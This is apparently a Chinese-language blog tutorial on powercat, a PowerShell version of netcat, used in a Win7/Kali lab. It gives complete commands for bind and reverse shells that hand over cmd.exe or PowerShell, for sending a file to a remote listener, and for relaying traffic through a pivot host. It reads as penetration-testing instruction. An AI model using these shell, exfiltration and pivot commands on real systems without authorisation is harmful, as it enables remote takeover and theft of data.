powercat——powershell版的“netcat”

项目地址:https://github.com/besimorhino/powercat.git

powercat与netcat的命令功能非常相似,可以相互连接。其中powercat可以返回powershell,而netcat不支持。

导入powercat:

powershell  #进入powershell命令行
Set-ExecutionPolicy RemoteSigned #设置允许执行本地powershell脚本
Import-Module ./powercat.ps1
powercat -h

nc正向连接PowerCat:

在win7上执行命令,开始监听:powercat -l -p 4444 -e cmd.exe -v


在kali上执行命令,连接win7端口获得cmd命令行:nc 192.168.83.91 4444 -vv

nc反向连接PowerCat:

在kali上执行命令监听:nc -l -p 4444 -vv


在win7中执行命令:powercat -c 192.168.83.100 -p 4444 -v -e cmd.exe

通过PowerCat反弹PowerShell:
在kali上执行命令监听:nc -l -p 4444 -vv开始监听
在win7中执行命令:powercat -c 192.168.83.100 -p 4444 -v -ep

通过PowerCat与nc传输文件:
在kali上执行命令监听:nc -l -p 4444 > test.txt开始监听,并把传输的内容写入到test.txt中
在win7中执行命令:powercat -c 192.168.83.100 -p 4444 -i C:\powercat-master\README.md -v

netcat没有任何显示,但已经传输成功

使用PowerCat作为跳板:
靶机监听:powercat -l -v -p 6666 -e cmd.exe
跳板机监听:powercat -l -v -p 4444 -r tcp:192.168.83.91:6666
这样,当访问跳板机的4444端口时,就会把流量转发给靶机(192.168.83.91)的6666端口中了

你可能感兴趣的:(powercat——powershell版的“netcat”)